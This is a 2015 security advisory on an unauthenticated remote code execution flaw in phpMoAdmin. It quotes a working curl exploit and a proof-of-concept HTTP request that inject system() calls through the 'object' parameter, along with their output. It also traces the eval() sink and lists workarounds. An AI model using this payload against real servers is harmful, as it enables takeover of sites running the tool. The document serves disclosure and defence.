
PHPMoAdmin Unauthorized Remote Code Execution Vulnerability

Posted: 2015-03-17 09:41:57

Published: 2015-03-04
Updated: 2015-03-05
Affected systems:
PHPMoAdmin
Details:
MongoDB is an open-source NoSQL database. phpMoAdmin is a free, open-source, PHP-based, AJAX-driven GUI administration tool for MongoDB that lets administrators manage a NoSQL database with ease.

phpMoAdmin contains a remote code execution vulnerability in its implementation; an unauthenticated remote user can exploit it to take over a website that uses the phpMoAdmin tool.


Source:
sp1nlock
References:
http://www.exploit-db.com/exploits/36251/
Test method:
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | |  \| | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sell this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .
drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693: eval('$obj=' . $obj . ';'); //cast from string to array
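
The analysis above shows a POST value being spliced into eval() and executed before any authentication check. As an added illustration (not phpMoAdmin's code and not the vendor's patch), the following PHP places that vulnerable saveObject() shape beside a hardened one that treats the submitted document as JSON data and refuses unauthenticated callers; the function names, the $authenticated flag and the 1 MiB size limit are assumptions, and the admin form would have to submit JSON instead of PHP array syntax.

```php
<?php
// Added illustration, not phpMoAdmin's own code.

// Vulnerable shape, as in moadmin.php line 693: the raw POST value becomes
// PHP source, so a body of "1;system('id');exit" is executed as code.
// Kept here for comparison only; it is never called below.
function saveObjectVulnerable($obj)
{
    eval('$obj=' . $obj . ';'); // cast from string to array
    return $obj;
}

// Hardened shape (assumed design, not the vendor's patch): the caller must be
// authenticated, the input is bounded in size, and it is parsed as data with
// json_decode() rather than evaluated. Requires PHP 7.3+ for JSON_THROW_ON_ERROR.
function saveObjectHardened(string $raw, bool $authenticated): array
{
    if (!$authenticated) {
        throw new RuntimeException('authentication required');
    }
    if (strlen($raw) > 1048576) { // assumed 1 MiB cap on a single document
        throw new InvalidArgumentException('document too large');
    }
    $doc = json_decode($raw, true, 64, JSON_THROW_ON_ERROR);
    if (!is_array($doc)) { // a bare scalar such as "1" is not a document
        throw new InvalidArgumentException('document must be a JSON object');
    }
    return $doc;
}

// Constructed inputs: the advisory's PoC body value and a legitimate document.
$poc   = "1;system('id');exit";
$valid = '{"name": "alice", "roles": ["admin"]}';

try {
    saveObjectHardened($poc, true);
} catch (JsonException $e) {
    echo 'rejected PoC payload as malformed JSON: ' . $e->getMessage() . PHP_EOL;
}
try {
    saveObjectHardened($valid, false);
} catch (RuntimeException $e) {
    echo 'rejected unauthenticated request: ' . $e->getMessage() . PHP_EOL;
}
var_dump(saveObjectHardened($valid, true)); // array(2) { name, roles }
```
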

Solution:
Temporary workaround:

We recommend the following measures to reduce the threat:

* Until the developer releases a fix, MongoDB users should stop using the phpMoAdmin tool for the time being.

* Alternatively, use another free MongoDB GUI tool for now, for example:
RockMongo
MongoVUE
Mongo-Express
UMongo
Genghis

* Or restrict unauthenticated access to the moadmin.php file with password protection configured in the web server's per-directory configuration (an .htaccess password).

Vendor patch:

PHPMoAdmin
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.phpmoadmin.com/